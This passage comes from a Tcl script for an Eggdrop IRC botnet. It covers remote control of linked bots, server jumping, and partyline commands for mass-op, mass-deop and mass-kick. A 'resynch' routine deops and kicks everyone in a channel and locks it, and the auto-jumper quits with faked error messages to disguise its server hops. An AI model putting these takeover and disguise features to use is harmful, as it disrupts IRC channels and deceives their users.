bind dcc m mver dcc:netver
bind dcc m ping dcc:netping
bind dcc t mrehash dcc:hash
bind dcc t msave dcc:msave
bind dcc m ljoin dcc:ljoin
bind dcc m ujoin dcc:ujoin
bind dcc m upart dcc:upart
bind dcc m mjoin dcc:+netchannel
bind dcc m mpart dcc:-netchannel
bind dcc m mleave dcc:-netchannel
bind dcc m mmsg dcc:netmsg
bind dcc n mcycle dcc:netcycle
bind bot - share bot:share ; bind bot - del bot:del
bind bot - botchattr bot:chattr ; bind bot - botbchattr bot:bchattr
bind bot - netver bot:netver ; bind bot - netsave bot:msave
if {$limbo == 0} {
 bind bot - rjoin bot:rjoin ; bind bot - amsg bot:netmsg
 bind bot - +channel bot:+channel ; bind bot - -channel bot:-channel
 bind bot - cycle bot:cycle ; bind bot - mode bot:chanset
 bind bot - setchanmode bot:mode ; bind bot - nethash bot:hash
}
proc dcc:share {hand idx vars} {
 set who [lindex $vars 0] ; set newhost [lindex $vars 1]
 set newport [lindex $vars 2]
 if {$newport == ""} {
  putdcc $idx "[sv] \[usage\] .share <bot> <host> <port>" ; return 0
 }
 addbot $who $newhost:$newport ; botattr $who +ph
 putcmdlog "[sv] \[botnet\] - added new hub $who - $newhost:$newport"
 putallbots "share $who $newhost $newport"
}
proc bot:share {bot cmd vars} {
 set who [lindex $vars 0] ; set newhost [lindex $vars 1]
 set newport [lindex $vars 2] ; addbot $who $newhost:$newport
 botattr $who +p ; chattr $who +of
 putcmdlog "[sv] \[botnet\] - added new bot $who"
 dccbroadcast "[sv] \[botnet\] - added $who as hub" ; return 0
}
proc dcc:ljoin {hand idx arg} {
 global channels ; set botno [lindex $arg 0] ; set channel [lindex $arg 1]
 if {$botno < 1 || $channel == ""} {
  putdcc $idx "[sv] \[botnet\] - usage: .ljoin <howmanybots> <channel>"
  return 0
 }
 if {![isown $hand] && $botno > 20} { set botno 20 }
 if {[llength [bots]] < 2} {
  putlog "[sv] \[botnet\] - not enough bots linked to do a join :/" ; return 0
 }
 putlog "[sv] \[botnet\] - joining [b]$botno[b] bots into channel [b]$channel[b] ($hand)"
 for { set i 1 } { $i <= $botno } { incr i } {
  putbot [randbot] "+channel $channel $hand"
 }
 putdcc $idx "[sv] \[botnet\] - done, put $botno bots into $channel"
 return 1
}
proc dcc:ujoin {hand idx arg} {
 global channels ; set bot [lindex $arg 0] ; set channel [lindex $arg 1]
 if {$channel == ""} {
  putdcc $idx "[sv] \[botnet\] - usage: .ujoin <bot> <channel>" ; return 0
 }
 if {![islinked $bot]} {
  putdcc $idx "[sv] \[botnet\] - bot $bot is not on the botnet, sorry"
  return 0
 }
 putbot $bot "+channel $channel $hand"
 putdcc $idx "[sv] \[botnet\] put $bot into $channel" ; return 1
}
proc dcc:upart {hand idx arg} {
 global channels ; set bot [lindex $arg 0] ; set channel [lindex $arg 1]
 if {$channel == ""} {
  putdcc $idx "[sv] \[botnet\] - usage: .upart <bot> <channel>" ; return 0
 }
 if {![islinked $bot]} {
  putdcc $idx "[sv] \[botnet\] - bot $bot is not on the botnet, sorry"
  return 0
 }
 putbot $bot "-channel $channel $hand"
 putdcc $idx "[sv] \[botnet\] removed $bot from $channel" ; return 1
}
proc dcc:+netchannel {hand idx arg} {
 global channels
 if {![isown $hand]} {
  putdcc $idx "[sv] \[botnet\] - only perm owners can mjoin - try ljoin"
  dccbroadcast "[sv] \[security\] - .mjoin attempt from $hand" ; return 0
 }
 set channel [lindex $arg 0]
 if {$arg == ""} {
  putdcc $idx "[sv] \[botnet\] - please specify a channel to massjoin"
  return 0
 }
 newchannel $channel
 putlog "[sv] \[botnet\] - sending join command for [b]$channel[b] to botnet ($hand)"
 putallbots "+channel $channel $hand"
 return 1
}
proc bot:-channel {hand idx arg} {
 global channels ; set channel [lindex $arg 0] ; set parter [lindex $arg 1]
 if {![matchattr $parter m]} {
  putlog "[sv] \[security\] - netpart from $parter on $hand DENIED"
  dccbroadcast "[sv] DENIED part - [b]not a botnet master[b]: $parter"
  return 0
 }
 putcmdlog "[sv] \[botnet\] - remote [b]part[b] command from $hand for [b]$channel[b]"
 foreach chanf00 [channels] {
  if {[string tolower $chanf00] == [string tolower $channel]} { channel remove $channel }
 }
 putlog "[sv] \[channel\] - removed channel [b]$channel[b]"
 return 1
}
proc bot:+channel {hand idx arg} {
 global channels botnick
 set channel [lindex $arg 0] ; set joiner [lindex $arg 1]
 foreach chanf00 [channels] {
  if {$chanf00 == $channel} { return 0 }
 }
 if {![matchattr $joiner m]} {
  putlog "[sv] \[security\] - netjoin from $joiner on $hand DENIED"
  dccbroadcast "[sv] DENIED join - [b]not a botnet master[b]: $joiner"
  return 0
 }
 putcmdlog "[sv] \[botnet\] - remote [b]join[b] command from $joiner @ $hand for [b]$channel[b]"
 putlog "[sv] \[security\] - netjoin from $joiner on $hand"
 newchannel $channel ; return 0
}
proc dcc:-netchannel {hand idx arg} {
 set channel [lindex $arg 0]
 if {$arg == ""} {
  putdcc $idx "[sv] \[botnet\] - please specify a channel to masspart"
  return 0
 }
 if {![isown $hand] && [string tolower $channel] == [string tolower [lindex [channels] 0]]} {
  putlog "[sv] \[botnet\] - $hand tried to leave primary channel - denied"
  putdcc $idx "[sv] \[security\] - only perm owners can mleave home channels"
 }
 putlog "[sv] \[botnet\] - sending part command for [b]$channel[b] to botnet ($hand)"
 dccbroadcast "[sv] \[botnet\] Masspart from $channel authorized by $hand..."
 utimer [rand 30] "putallbots \"-channel $channel $hand\""
 catch "channel remove $channel" ; return 1
}
proc bot:link {linkbot hub} {
 global botnick nick owner ; if {$linkbot == $nick} { return 0 }
 if {![matchattr $linkbot s]} {
  putcmdlog "[sv] \[botnet\] - bot [b]$linkbot[b] is not sharebot, no remote join command issued"
  return 0
 }
 foreach chanlist [channels] {
  putbot $linkbot "+channel $chanlist [owner1]"
  putcmdlog "[sv] \[botnet\] - sending join command for [b]$chanlist[b] to sharebot [b]$linkbot[b]"
 }
 return 1
}
proc dcc:netmsg {hand idx vars} {
 global botnick ; set who [lindex $vars 0] ; set why [lrange $vars 1 end]
 if {$why == ""} {
  putdcc $idx "[sv] \[botnet\] please specify a nick and a message"
  return 0
 }
 putserv "PRIVMSG $who :$why" ; putallbots "amsg $who $why"
 putcmdlog "[sv] \[botnet\] mass messaging $who ($why)"
 return 1
}
proc bot:netmsg {hand idx vars} {
 global botnick ; set who [lindex $vars 0] ; set why [lrange $vars 1 end]
 putserv "PRIVMSG $who :$why"
 putcmdlog "[sv] \[botnet\] mass messaging $who ($why)" ; return 1
}
proc dcc:netcycle {handle idx arg} {
 global channels numchannels
 set channel [lindex $arg 0]
 if {$arg == ""} {
  putdcc $idx "[sv] \[botnet\] - please specify a channel to mass-cycle"
  return 0
 }
 putallbots "cycle $channel"
 utimer 30 "putserv \"JOIN $channel\"" ; utimer 30 "putserv \"PART $channel\""
 putlog "[sv] \[botnet\] - mass cycling $channel, making bots leave the channel for one minute"
 return 1
}
proc bot:cycle {hand idx arg} {
 global channels
 set channel [lindex $arg 0] ; if {![validchan $channel]} { return 0 }
 utimer 30 "newchannel $channel" ; channel remove $channel
 putlog "[sv] \[botnet\] - botnet is cycling $channel - waiting one minute for re-join"
 return 1
}
proc dcc:netchanset {hand idx vars} {
 global botnick ; set who [lindex $vars 0] ; set why [lrange $vars 1 end]
 if {$why == ""} {
  putdcc $idx "[sv] \[botnet\] - please specify a channel and one of the following modes \[+/-\]"
  putdcc $idx "[sv] \[botnet\] - [b]autoop bitch clearbans dynamicbans enforcebans greet[b]"
  putdcc $idx "[sv] \[botnet\] - [b]protectops revenge secret shared statuslog stopnethack[b]"
  return 0
 }
 channel set $who $why ; putallbots "mode $who $why"
 putdcc $idx "[sv] \[botnet\] - channel $who is set to $why" ; return 1
}
proc bot:chanset {hand idx vars} {
 global botnick ; set who [lindex $vars 0] ; set why [lrange $vars 1 end]
 channel set $who $why
 putlog $idx "[sv] \[botnet\] - channel $who is set to $why" ; return 1
}
proc dcc:massdel {hand idx vars} {
 global mainchan ; set who [lindex $vars 0]
 if {$who == ""} {
  putdcc $idx "[sv] \[botnet\] - please specify a user to remove" ; return 0
 }
 if {[isown $who]} {
  if {![isown $hand]} { setuser $hand PASS [hash $hand] ; save }
  boot $hand "Massdelete an owner? No!"
  dccbroadcast "Removed $hand - mass delete attempt"
  putcmdlog "[sv] \[security alert\] $hand tried to mass delete an owner. Account disabled."
  return 0
 }
 putallbots "del $who" ; deluser $who ; save
 putlog "[sv] \[botnet\] - removing user [b]$who[b]"
}
proc bot:del {bot cmd who} {
 if {![isown $who]} {
  deluser $who ; putlog "[sv] \[botnet\] - removing user [b]$who[b]" ; save
 } {
  ialarm 3 "$bot tried to delete $who!!!"
 }
}
proc dcc:mpass {hand idx vars} {
 set who [lindex $vars 0] ; set pass [lindex $vars 1]
 if {[isown $who]} {
  boot $hand "Change an owner password? No!"
  dccbroadcast "Removed $hand - mass pass attempt"
  putcmdlog "[sv] \[security alert\] $hand tried to change pass for ${who}. Account disabled."
  return 0
 }
 setuser $who PASS $pass ; putallbots "botpass $who $pass"
 putcmdlog "[sv] \[botnet\] - mass changed pass for $who" ; return 0
}
proc bot:mpasswd {bot cmd vars} {
 set who [lindex $vars 0] ; set pass [lindex $vars 1]
 if {[passwdok $who $pass]} { return 0 }
 putallbots "secu remote password change from $bot for $who - seems OK"
 setuser $who PASS $pass ; putcmdlog "[sv] \[botnet\] changed password for
$who"
 return 0
}
proc dcc:mchattr {hand idx vars} {
 set who [lindex $vars 0] ; set flag [lindex $vars 1]
 if {$flag == ""} {
  putdcc $idx "[sv] \[botnet\] - please specify the nick and the flags to be changed"
  return 0
 }
 if {[isown $who]&&![isown $hand]} {
  boot $hand "Masschattr? No!"
  dccbroadcast "Removed $hand - mass chattr attempt"
  putcmdlog "[sv] \[security alert\] $hand tried to chattr $who - Account disabled."
  return 0
 }
 chattr $who $flag ; putallbots "botchattr $who $flag $hand"
 putlog "[sv] \[botnet\] added [b]$flag[b] to user [b]$who[b]" ; return 1
}
proc bot:chattr {bot cmd vars} {
 set who [lindex $vars 0] ; set flag [lindex $vars 1]
 set hand [lindex $vars 2]
 if {![matchattr $hand n]} {
  putcmdlog "[sv] \[security\] mchattr from non owner $hand @ $bot ignored"
  putbot $bot "secu I do not recognize $hand as owner - mchattr denied"
  return 0
 }
 chattr $who $flag
 putlog "[sv] \[botnet\] added [b]$flag[b] to user [b]$who[b]" ; return 0
}
proc dcc:mbchattr {hand idx vars} {
 set who [lindex $vars 0] ; set flag [lindex $vars 1]
 if {$flag == ""} {
  putdcc $idx "[sv] \[botnet\] - please specify the bot and the flags to be changed"
  return 0
 }
 botattr $who $flag ; putallbots "botbchattr $who $flag"
 putlog "[sv] \[botnet\] added [b]$flag[b] to bot [b]$who[b]" ; return 1
}
proc bot:bchattr {bot cmd vars} {
 set who [lindex $vars 0] ; set flag [lindex $vars 1] ; botattr $who $flag
 putlog "[sv] \[botnet\] added [b]$flag[b] to bot [b]$who[b]"
}
proc bot:mode {bot cmd vars} {
 set who [lindex $vars 0] ; set why [lrange $vars 1 end]
 putlog "[sv] \[channel\] - mmode [b]$who[b] $why"
 channel set $who chanmode $why ; return 1
}
proc dcc:netmode {hand idx vars} {
 global botnick ; set who [lindex $vars 0] ; set why [lrange $vars 1 end]
 if {$why == ""} {
  putdcc $idx "[sv] \[botnet\] - please specify a channel and the massmodes"
  putdcc $idx "[sv] \[botnet\] - valid modes: \[+/-\] bo / iklmnpst"
  return 0
 }
 putallbots "setchanmode $who $why"
 if {[validchan $who]} { channel set $who chanmode $why }
 putlog "[sv] \[botnet\] - mmode [b]$who[b] $why"
 putdcc $idx "[sv] \[botnet\] - now enforcing $why on $who"
 return 1
}
proc bot:hash {bot cmd arg} {
 putlog "[sv] \[botnet\] rehashing, requested by $bot" ; rehash
}
proc bot:msave {bot cmd arg} {
 putlog "[sv] \[botnet\] saving files, requested by $bot" ; save ; savechannels
}
proc dcc:hash {nick cmd arg} {
 putlog "[sv] \[botnet\] rehashing, requested by $nick" ; putallbots "nethash"
}
proc dcc:msave {nick cmd arg} {
 putlog "[sv] \[botnet\] mass-saving, requested by $nick"
 putallbots "netsave" ; save ; savechannels
}
proc dcc:rjoin {hand idx arg} {
 set aval [lindex $arg 0]
 if {$aval == 0} {
  putcmdlog "[sv] \[botnet\] [b]disabling[b] remote joins"
  dccbroadcast "[sv] RJoins are [b]OFF[b]"
  catch { unbind link - * bot:link ; putallbots "rjoin 0" } ; return 0
 }
 if {$aval == 1} {
  putcmdlog "[sv] \[botnet\] [b]enabling[b] remote joins"
  dccbroadcast "[sv] RJoins are [b]ON[b]"
  bind link - * bot:link ; putallbots "rjoin 1" ; return 0
 }
 putdcc $idx "usage: .rjoin 0/1 - disables/enables remote joins on the botnet"
 return 1
}
proc bot:rjoin {bot cmd vars} {
 set aval [lindex $vars 0]
 if {$aval == 0} {
  dccbroadcast "[sv] RJoins are [b]OFF[b]"
  catch { unbind link - * bot:link } ; return 0
 }
 if {$aval == 1} {
  dccbroadcast "[sv] RJoins are [b]ON[b]"
  bind link - * bot:link ; return 0
 }
 return 1
}
proc bot:netver {bot cmd arg} {
 putlog "[sv] \[botnet\] botnet version requested by $bot"
 global numversion nick1 server limbo
 if {$limbo!=0} {
  dccbroadcast "\[botnet version\] $nick1 - eggdrop: $numversion - [b]LIMBO[b]"
  return 0
 }
 dccbroadcast "\[botnet version\] $nick1 - eggdrop: $numversion server: $server script: [sv] [rv]"
}
proc dcc:netping {nick cmd arg} {
 if {![islinked $arg]} {
  putdcc $cmd "[sv] \[error\] bot [b]$arg[b] is not currently linked" ; return 0
 }
 putlog "[sv] \[botnet\] $nick pinged [lindex $arg 0]"
 putbot [lindex $arg 0] "netver" ; return 0
}
proc dcc:netver {nick cmd arg} {
 putlog "[sv] \[botnet\] botnet version requested by $nick"
 putallbots "netver" ; return 0
}
putlog "[sv] \[init\] - 0x09 - botnet remote control"
## 0x0a. JUMP. change servers automatically, and massjump from specific ones
if {$limbo == 0} {
 bind dcc n autojump dcc:ajump
 bind dcc n ajump dcc:ajump
 bind dcc n jumpfrom dcc:jumpfrom
 bind dcc n jumpto dcc:jumpto
 bind bot - jumpfrom bot:jumpfrom
}
set jumpquit {
 "Broken pipe" "Connection reset by peer" "Connection timed out"
 "Read error: 0 (Error 0)" "EOF From client" "EOF of client" "I Quit"
 "Leaving" "Connection refused" "Network unreachable" "No route to host"
 "Operation timed out" "SendQ exceeded" "Idle time limit exceeded" "Client Quit"
 "Ping timeout" "Hey!  Where'd my controlling terminal go?"
 "Ping timeout: 120 seconds" "Ping timeout: 240 seconds"
 "Ping timeout: 180 seconds" "Ping timeout: 190 seconds"
 "Read error: 32 (Broken pipe)" "Changing Servers" "BitchX-75p1 -- just do it."
 "BitchX-75p2 -- just do it." "BitchX-75p3 -- just do it."
 "Read error: 54 (Connection reset by peer)"
}
lappend jumpquit "$nick1 has no reason" ; lappend jumpquit "$nick1"
proc dcc:ajump {hand idx arg} {
 if {[lindex $arg 0] == "0"} {
  putcmdlog "\[autojump\] autojumps disabled by $hand"
  foreach scantimer [timers] { if {[lindex $scantimer 1]=="autojump"} {killtimer "[lindex $scantimer 2]" }}
  return 0
 }
 if {[lindex $arg 0] == "1"} {
  putcmdlog "\[autojump\] autojumps enabled by $hand" ; autojump ; return 0
 }
 putcmdlog "\[autojump\] usage: .ajump 0/1 - disable/enable autojumping"
 return 0
}
proc autojump {} {
 global servers jumpquit
 if {[llength [bots]] > 3} {
  putserv "QUIT :[lindex $jumpquit [rand [llength $jumpquit]]]" ; jump
  putcmdlog "[sv] \[autojump\] I am autojumping"
 }
 foreach scantimer [timers] { if {[lindex $scantimer 1]=="autojump"} {killtimer "[lindex $scantimer 2]" }}
 timer 1[rand 2000] autojump
}
foreach scantimer [timers] { if {[lindex $scantimer 1]=="autojump"} {killtimer "[lindex $scantimer 2]" }}
timer 1[rand 2000] autojump
proc dcc:jumpfrom {hand idx vars} {
 global server jumpquit
 if {![isown $hand]} {
  putdcc $idx "[sv] \[security\] Access denied." ; return 0
 }
 if {$vars == ""} {
  putdcc $idx "[sv] \[jump\] - please specify a server" ; return 0
 }
 if {$vars == $server} {
  putserv "QUIT :[lindex $jumpquit [rand [llength $jumpquit]]]"
 }
 putallbots "jumpfrom $vars $hand"
 putcmdlog "[sv] \[jump\] $hand mass jumped botnet from $vars" ; return 0
}
proc dcc:jumpto {hand idx vars} {
 global server jumpquit nick1
 if {![isown $hand]} {
  putdcc $idx "[sv] \[security\] Access denied." ; return 0
 }
 if {$vars == ""} {
  putdcc $idx "[sv] \[jump\] - please specify a server" ; return 0
 }
 putcmdlog "[sv] \[jump\] $hand mass jumped botnet to $vars"
 putserv "QUIT :[lindex $jumpquit [rand [llength $jumpquit]]]" ; jump $vars
 putallbots "jumpfrom [hash $nick1] $hand $vars" ; return 0 
}
proc bot:jumpfrom {bot cmd arg} {
 global server jumpquit ; set srv [lindex $arg 0] ; set own [lindex $arg 1]
 if {![matchattr $own n]} {
  putcmdlog "[sv] \[security\] invalid jump request $srv from $own @ $bot"
  return 0
 }
 if {$srv == [hash bot]} {
  putlog "[sv] \[jump\] jumping to [lindex $arg 2], requested by ${own}..."
  putserv "QUIT :[lindex $jumpquit [rand [llength $jumpquit]]]"
  jump [lindex $arg 2]
 } {
  if {[string compare $srv $server] == 0} {
   putcmdlog "[sv] \[jump\] jumping from ${server}, requested by ${own}..."
   putserv "QUIT :[lindex $jumpquit [rand [llength $jumpquit]]]"
   }
  }
 return 0
}
putlog "[sv] \[init\] - 0x0a - auto jumper"
## 0x0b. DCC. dcc chat console commands for all kinds of purposes
bind dcc m checkpass dcc:checkpass
bind dcc o crack dcc:lamepass
bind dcc o notice dcc:notice
bind dcc m massop dcc:massop
bind dcc m massdeop dcc:massdeop
bind dcc m masskick dcc:masskick
bind dcc o ctcp dcc:ctcp
bind dcc o rctcp dcc:ctcprep
bind dcc n fchattr dcc:fc
bind dcc n fc dcc:fc
bind dcc m botnick dcc:botnick
bind dcc o dcc dcc:pdcc
bind dcc m resynch dcc:resynchdeop
bind chon - * dcc:welcome
bind chof - * dcc:seeya
bind dcc n spynotes dcc:spynotes
bind dcc m sendmail dcc:sendmail
bind dcc m mail dcc:sendmail
bind dcc m alarms dcc:hacks
bind dcc m sendlog dcc:sendlog
bind dcc o topic dcc:topic
bind dcc n socks dcc:socks
if {$limbo == 0} {
 bind topc - * tchange
 bind join p * join:checkpass
}
proc join:checkpass {nick uhost hand chan} {
 global botnick altpass ; set ch [passwdok "$hand" ""]
 if {[matchattr $hand b]} { return 0 }
 if {$ch == 1} {
  putcmdlog "[sv] \[security\] $nick ($hand) does not have a password set. Msg'ing..."
  putserv "privmsg $nick :You dont have a password set! Please type: [b]/msg $botnick $altpass <PASSWORD>"
 }
}
proc dcc:checkpass {hand idx arg} {
 putcmdlog "#$hand# checkpass"
 foreach user [userlist p] {
  set ch [passwdok "$user" ""]
  if {$ch == 1} {
   putdcc $idx "[sv] \[security\] $user has not yet set a password."
  }
 }
}
proc dcc:botnick {hand idx arg} {
 global nick ; set newnick [lindex $arg 0]
 if {[strlen $newnick] < 1} {return 0} ; if {[strlen $newnick] > 9} {return 0}
 putcmdlog "[sv] \[dcc\] Botnick change: $nick -> $newnick by $hand"
 set nick $newnick ; return 0
}
proc dcc:pdcc {handle idx arg} {
 set who [lindex $arg 0] ; set myport [lindex $arg 1]
 if {$who == ""} {
  putdcc $idx "[sv] \[notice\] Who do you want me to DCC?" ; return 0
 }
 putdcc $idx "[sv] \[notice\] I am DCC chatting $who"
 putnotc $who "You have been invited to my partyline by $handle."
 putserv "PRIVMSG $who :\001DCC CHAT chat [myip] [port]\001" ; return 1
}
proc dcc:notice {hand idx arg} {
 set nick [lindex $arg 0] ; set msg [lindex $arg 1]
 if {[string match $msg ""]} {
  putdcc $idx "[sv] \[usage\] notice <nick> <message>" ; return 0
 }
 putdcc $idx "[sv] \[dcc\] notice to $nick: $msg" ; putnotc $nick $msg
 putcmdlog "[sv] \[dcc\] #$hand# notice $nick $msg" ; return 0
}
proc botnick {hand idx arg} {
 if {$arg == ""} {
  putdcc $idx "[sv] \[dcc\] usage: botnick <nick> changes bots ircname"
  return 1
 }
 putserv "NICK $arg" ; set nick $arg ; return 1
}
proc dcc:massop {hand idx arg} {
 global server ; set oplist ""
 set chan [lindex $arg 0] ; set rest [lrange $arg 1 end]
 if {$chan == ""} {
  putdcc $idx "[sv] \[error\] no channel specified" ; return 0
 }
 if {[lsearch -exact [string tolower [channels]] [string tolower $chan]] == -1} {
  putdcc $idx "[sv] \[error\] i am not on $chan" ; return 0
 }
 if {![botisop $chan]} {
  putdcc $idx "[sv] \[error\] i need ops on $chan" ; return 0
 }
 if {$rest == ""} {
  putdcc $idx "[sv] \[channel\] oping all ops on $chan"
  foreach nick [chanlist $chan] {
   set who [nick2hand $nick $chan]
   if {([matchattr $who m] || [matchattr $who o]) && ![isop $nick $chan]} { append oplist " " $nick }
  }
 } {
  putdcc $idx "[sv] \[channel\] oping users matching hostmask on ${chan}: $rest"
  foreach hostmask $rest {
   foreach nick [chanlist $chan] {
    set userhost $nick ; append userhost "!" [getchanhost $nick $chan]
    set who [nick2hand $nick $chan]
    if {[string match $hostmask $userhost] && ![isop $nick $chan]} { append oplist " " $nick }
   }
  }
 }
 if {$oplist == ""} {
  putdcc $idx "[sv] \[notice\] no users on that channel to op" ; return 0
 }
 putdcc $idx "[sv] \[channel\] oping [llength $oplist] on ${chan}: $oplist"
 set cnt 0
 while {$cnt < [llength $oplist]} {
  putserv "MODE $chan +oooo [lindex $oplist $cnt] [lindex $oplist [expr $cnt + 1]] [lindex $oplist [expr $cnt + 2]] [lindex $oplist [expr $cnt + 3]]"
  incr cnt 4
 }
 return 1
}
proc dcc:massdeop {hand idx arg} {
 global server botnick
 set deoplist "" ; set chan [lindex $arg 0] ; set rest [lrange $arg 1 end]
 if {$chan == ""} { putdcc $idx "[sv] \[usage\] .md #channel" ; return 0 }
 if {[lsearch -exact [string tolower [channels]] [string tolower $chan]] == -1} {
  putdcc $idx "[sv] \[error\] i am not on $chan" ; return 0
 }
 if ![botisop $chan] {
  putdcc $idx "[sv] \[error\] i need ops on $chan" ; return 0
 }
 if {$rest == ""} {
  putdcc $idx "[sv] \[channel\] deoping everyone except masters on $chan"
  foreach nick [chanlist $chan] {
   set who [nick2hand $nick $chan]
   if {(![matchattr $who m] || $who == "*") && [isop $nick $chan] && $nick != $botnick} {
    append deoplist " " $nick
   }
  }
 } {
  putdcc $idx "[sv] \[channel\] deoping users matching hostmask on ${chan}: $rest"
  foreach hostmask $rest {
   foreach nick [chanlist $chan] {
    set userhost $nick ; append userhost "!" [getchanhost $nick $chan]
    set who [nick2hand $nick $chan]
    if {[string match $hostmask $userhost] && ![matchattr $who m] && $nick != $botnick} { append deoplist " " $nick }
   }
  }
 }
 if {$deoplist == ""} {
  putdcc $idx "[sv] \[error\] no one to deop" ; return 0
 }
 putdcc $idx "[sv] \[channel\] deoping [llength $deoplist] people on ${chan}: $deoplist"
 set cnt 0
 while {$cnt < [llength $deoplist]} {
  putserv "MODE $chan -oooo [lindex $deoplist $cnt] [lindex $deoplist [expr $cnt + 1]] [lindex $deoplist [expr $cnt + 2]] [lindex $deoplist [expr $cnt + 3]]"
  flushmode $chan ; incr cnt 4
 }
 return 1
}
proc dcc:masskick {hand idx arg} {
 global server botnick ; set kicklist ""
 set chan [lindex $arg 0] ; set rest [lrange $arg 1 end]
 if {$chan == ""} {
  putdcc $idx "[sv] \[usage\] please specify a channel to masskick on"
  return 0
 }
 if {[lsearch -exact [string tolower [channels]] [string tolower $chan]] == -1} {
  putdcc $idx "[sv] \[error\] i am not on $chan" ; return 0
 }
 if ![botisop $chan] {
  putdcc $idx "[sv] \[error\} i need ops on $chan" ; return 0
 }
 if {$rest == ""} {
  putdcc $idx "[sv] \[channel\] kicking all non-masters on $chan"
  foreach nick [chanlist $chan] {
   set who [nick2hand $nick $chan]
   if {(![matchattr $who m] || $who == "*") && $nick != $botnick} { append kicklist " " $nick }
  }
 } {
  putdcc $idx "[sv] \[channel\] kicking users matching hostmask ${chan}: $rest"
  foreach hostmask $rest {
   foreach nick [chanlist $chan] {
    set userhost $nick ; append userhost "!" [getchanhost $nick $chan]
    set who [nick2hand $nick $chan]
     if {[string match $hostmask $userhost] && ![matchattr $who m] && $nick != $botnick} { append kicklist " " $nick }
   }
  }
 }
 if {$kicklist == ""} {
  putdcc $idx "[sv] \[error\] no one to kick on $chan" ; return 0
 }
 putdcc $idx "[sv] \[channel\] kicking [llength $kicklist] people on ${chan}: $kicklist"
 set cnt 0
 while {$cnt < [llength $kicklist]} {
  set te "[u][b]e[b]nigm[b]a[b][u]"
  putserv "KICK $chan [lindex $kicklist $cnt] $te"
  putserv "KICK $chan [lindex $kicklist [expr $cnt + 1]] $te"
  putserv "KICK $chan [lindex $kicklist [expr $cnt + 2]] $te"
  putserv "KICK $chan [lindex $kicklist [expr $cnt + 3]] $te" ; incr cnt 4
 }
 return 1
}
proc dcc:resynchdeop {hand idx arg} {
 global server botnick ; set deoplist ""
 set chan [lindex $arg 0] ; set rest [lrange $arg 1 end]
 if {$chan == ""} {
  putdcc $idx "[sv] \[usage\] - .resynch #channel" ; return 0
 }
 if {[lsearch -exact [string tolower [channels]] [string tolower $chan]] == -1} {
  putdcc $idx "[sv] \[error\] i am not on $chan" ; return 0
  }
 if ![botisop $chan] {
  putdcc $idx "[sv] \[notice\] i am not opped on $chan or its desynched"
  putdcc $idx "[sv] \[notice\] $chan seems desynched - trying a mass-kick"
  resynch:kick ; return 1
 }
 if {$rest == ""} {
  putdcc $idx "[sv] \[resynch status\] beginning to resych $chan"
  foreach nick [chanlist $chan] {
   set who [nick2hand $nick $chan]
   if {[isop $nick $chan] && $nick != $botnick} { append deoplist " " $nick }
  }
 } {
  putdcc $idx "[sv] \[resynch status\] deopping everyone on $chan"
  foreach hostmask $rest {
   foreach nick [chanlist $chan] {
    set userhost $nick ; append userhost "!" [getchanhost $nick $chan]
    set who [nick2hand $nick $chan]
    if {[string match $hostmask $userhost] && $nick != $botnick} { append deoplist " " $nick }
   }
  }
 }
 if {$deoplist == ""} {
  putdcc $idx "[sv] \[resynch status\] no one to deop"
  resynch:kick $hand $idx $chan
  return 0
 }
 putdcc $idx "[sv] \[resynch status\] deoping [llength $deoplist] people on ${chan}: $deoplist"
 set cnt 0
 while {$cnt < [llength $deoplist]} {
  putserv "MODE $chan -oooo [lindex $deoplist $cnt] [lindex $deoplist [expr $cnt + 1]] [lindex $deoplist [expr $cnt + 2]] [lindex $deoplist [expr $cnt + 3]]"
  flushmode $chan ; incr cnt 4
 }
 putserv "MODE $chan +ik ENTITY" ; resynch:kick $hand $idx $chan
 return 1
}
proc resynch:kick {hand idx chan} {
 global server botnick ; set kicklist ""
 if {$chan == ""} {
  putdcc $idx "[sv] \[resynch status\] no channel - nothing to work with (!)"
  return 0
 }
 if {[lsearch -exact [string tolower [channels]] [string tolower $chan]] == -1} {
  putdcc $idx "[sv] \[resynch status\] server says i am not on channel $chan (!)"
  return 0
 }
 if ![botisop $chan] {
  putdcc $idx "[sv] \[resynch status\] server says i am not opped (!)"
 }
 putdcc $idx "[sv] \[resynch status\] mass kicking $chan"
 foreach nick [chanlist $chan] {
  set who [nick2hand $nick $chan]
  if {$nick != $botnick} { append kicklist " " $nick }
 }
 if {$kicklist == ""} {
  putdcc $idx "[sv] \[resynch status\] no one to kick - cycling"
  resynch:cycle $hand $idx $chan
 }
 putdcc $idx "[sv] \[resynch status\] kicking [llength $kicklist] people on ${chan}: $kicklist"
 set cnt 0
 while {$cnt < [llength $kicklist]} {
  set te ":[sv] - sorry, resynch - [sv]"
  putserv "KICK $chan [lindex $kicklist $cnt] $te"
  putserv "KICK $chan [lindex $kicklist [expr $cnt + 1]] $te"
  putserv "KICK $chan [lindex $kicklist [expr $cnt + 2]] $te" 
  putserv "KICK $chan [lindex $kicklist [expr $cnt + 3]] $te" ; incr cnt 4
 }
 putdcc $idx "[sv] \[resynch status\] kicked everyone from $chan - cycling"
 utimer 25 "resynch:cycle $hand $idx $chan"
}
proc resynch:cycle {hand idx chan} {
 global botnick
 if {([llength $chan] != 1) || ([string first # $chan] == -1)} {
  putdcc $idx "[sv] \[resynch status\] no channel - nothing to work with (!)"
  return 0
 }
 if {![onchan $botnick $chan]} {
  putdcc $idx "[sv] \[resynch status\] server says i am not on channel $chan (!)"
  return 1
 } else {
  putserv "JOIN $chan" ; putserv "PART $chan" ; putserv "JOIN $chan"
  if {![onchan $botnick $chan]} {
   putdcc $idx "[sv] \[resynch status\] could not rejoin $chan - argh" ; return 0
  }
  putdcc $idx "[sv] \[resynch status\] successfully joined $chan - resynch complete"
  putserv "TOPIC $chan :channel $chan resynched by [sv]" ; return 0
 }
}
set lip 0 ; set auth(0) 0
proc dcc:welcome {hand idx} {
 global server nick network allport botport useport limbo lip auth challenging
 if {![info exists auth($idx)]} {set auth($idx) 0}
 if {$challenging} {
  if {[isown $hand]||[matchattr $hand n]} {
   if {$lip} {
    putdcc $idx "Sorry, owner login already in progress. Log in later or from a non-owner account."
    putcmdlog "[sv] \[security\] Login failed for $hand: already authenticating an owner ([hand2idx $lip]) at this time."
    set lip 0
    killdcc $idx
    return 0
   } { set lip $idx }
   if {$auth($idx)==0} {
    putcmdlog "[sv] \[security\] Authorizing login for [b]$hand[b] on [b][boat][b]..."
    global challenge ; set challenge [rword 32]
    putdcc $idx "-*- Blowfish check: [encrypt . .] LOCAL Tcl size: [file size entity.tcl] -*-"
    putdcc $idx "User Access Verification. Challenge: $challenge"
    control $idx radius
    if {$lip} { set lip 0 }
   }
  }
